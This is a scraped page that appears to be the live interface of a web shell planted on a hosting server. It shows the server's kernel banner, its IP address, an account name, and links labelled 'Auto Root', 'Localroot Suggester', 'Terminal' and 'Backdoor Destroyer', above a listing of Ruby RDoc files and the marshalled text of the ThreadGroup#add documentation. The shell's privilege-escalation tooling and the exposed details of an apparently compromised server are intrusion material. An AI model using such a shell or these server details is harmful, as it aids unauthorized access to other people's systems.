Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.130
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby27 /
share /
ri /
system /
ThreadGroup /
Delete
Unzip
Name
Size
Permission
Date
Action
add-i.ri
1.06
KB
-rw-r--r--
2023-06-06 18:25
cdesc-ThreadGroup.ri
1.05
KB
-rw-r--r--
2023-06-06 18:25
enclose-i.ri
836
B
-rw-r--r--
2023-06-06 18:25
enclosed%3f-i.ri
389
B
-rw-r--r--
2023-06-06 18:25
list-i.ri
500
B
-rw-r--r--
2023-06-06 18:25
Save
Rename
U:RDoc::AnyMethod[iI"add:ETI"ThreadGroup#add;TF:privateo:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [I"GAdds the given +thread+ to this group, removing it from any other ;TI"9group to which it may have previously been a member.;To:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I":puts "Initial group is #{ThreadGroup::Default.list}" ;TI"tg = ThreadGroup.new ;TI"t1 = Thread.new { sleep } ;TI"t2 = Thread.new { sleep } ;TI"puts "t1 is #{t1}" ;TI"puts "t2 is #{t2}" ;TI"tg.add(t1) ;TI";puts "Initial group now #{ThreadGroup::Default.list}" ;TI"$puts "tg group now #{tg.list}" ;T:@format0o; ; [I"This will produce:;T@o;; [ I"+Initial group is #<Thread:0x401bdf4c> ;TI" t1 is #<Thread:0x401b3c90> ;TI" t2 is #<Thread:0x401b3c18> ;TI"@Initial group now #<Thread:0x401b3c18>#<Thread:0x401bdf4c> ;TI"&tg group now #<Thread:0x401b3c90>;T; 0: @fileI" thread.c;T:0@omit_headings_from_table_of_contents_below0I""thgrp.add(thread) -> thgrp ;T0[ I" (p1);T@%FI"ThreadGroup;TcRDoc::NormalClass00